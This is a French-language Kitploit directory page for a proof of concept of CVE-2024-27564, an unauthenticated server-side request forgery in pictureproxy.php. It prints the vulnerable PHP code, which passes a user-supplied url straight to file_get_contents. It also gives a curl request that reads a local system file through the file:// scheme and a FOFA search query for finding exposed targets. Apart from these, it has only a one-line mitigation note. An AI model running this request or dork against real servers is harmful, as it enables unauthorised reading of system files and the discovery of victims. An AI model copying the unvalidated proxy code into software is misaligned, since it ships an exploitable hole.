Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-27564 — Preuve de concept pour CVE-2024-27564, une SSRF non authentifiée dans pictureproxy.php via le paramètre url, avec le code vulnérable, un PoC curl et des notes d'atténuation. | Kitploit
Outils/GitHubGitHub/babydessy/cve-2024-27564
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebArticles et Recherche
GitHubbabydessy/cve-2024-27564

CVE-2024-27564

Preuve de concept pour CVE-2024-27564, une SSRF non authentifiée dans pictureproxy.php via le paramètre url, avec le code vulnérable, un PoC curl et des notes d'atténuation.

Voir le dépôt
31il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-27564

Description :

Une vulnérabilité dans pictureproxy.php permet à des attaquants distants d'effectuer des requêtes arbitraires en injectant des URLs dans le paramètre url. Cette vulnérabilité SSRF peut être exploitée sans authentification, ce qui la rend particulièrement dangereuse.

Le code vulnérable se trouve dans le fichier pictureproxy.php. Le problème survient parce que la fonction ne valide pas correctement le paramètre url. La variable $_GET['url'] est passée à la fonction file_get_contents(), qui récupère le contenu de l'URL spécifiée. Cela peut conduire à une SSRF.

PoC :

root@kitploit:~
<?php
if (isset($_GET['url'])) {
    $image = file_get_contents($_GET['url']);
    header("Content-type: image/jpeg");
    echo $image;
} else {
    echo "Invalid request";
}

Requête Curl :

root@kitploit:~
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password

Dorking :

FOFA= "title="ChatGPT个人专用版""

Mitigation :

Une bonne gestion de la validation des entrées est nécessaire.

Télécharger l’outil